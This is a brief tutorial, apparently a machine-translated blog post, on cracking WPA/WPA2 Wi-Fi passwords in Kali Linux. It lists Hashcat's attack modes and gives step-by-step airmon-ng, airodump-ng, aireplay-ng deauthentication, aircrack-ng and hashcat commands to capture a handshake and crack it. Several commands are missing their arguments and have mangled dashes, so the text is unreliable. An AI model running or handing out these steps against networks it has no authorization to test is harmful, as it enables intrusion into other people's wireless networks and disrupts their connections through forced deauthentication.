Cracking WPA2/WPA passwords using Hashcat in Kali Linux

WPA2/WPA Hashcat

Hashcat, as a modest note the authors, this is the quickest tool for password recovery using the GPU. The program is free, although it contains proprietary code base. Versions are available for Linux, OSX, and Windows, there are options for the central computer CPU and GPU. Hashcat currently supports a huge number of hashing algorithms, including Microsoft LM Hashes, MD4, MD5, SHA family, Unix Crypt format, MySQL, Cisco PIX, and many others.

The types of attacks

Hashcat offers many models of attacks for an effective and comprehensive coverage hash space. There are the following modes:
  • Brute-force attack (attack)
  • combinatorial attack
  • Dictionary Attack
  • Attack on prints
  • hybrid attack
  • Mask attack
  • permutation attack
  • The attack is based on rules
  • tabular attack
  • Attack switching layouts

Cracking WPA2 / WPA passwords using Hashcat

Step 1: Start wifi card monitor mode

airmon-ng start wlan0

Step 2: Capturing wifi package using airodump-ng:

airodump-ng wlan0mon

Step 3: Choose wifi network and capture this wifi network package

airodump-ng –bssid -c –write wlan0mon

Step 4: Take the handshake:

aireplay-ng –deauth -a wlan0mon

Step 5: Get handshake package


Step 6: Convert pcap format to hccap

aircrack-ng -J

Step 7: Crack hccap:

hashcat -m 2500 wordlist
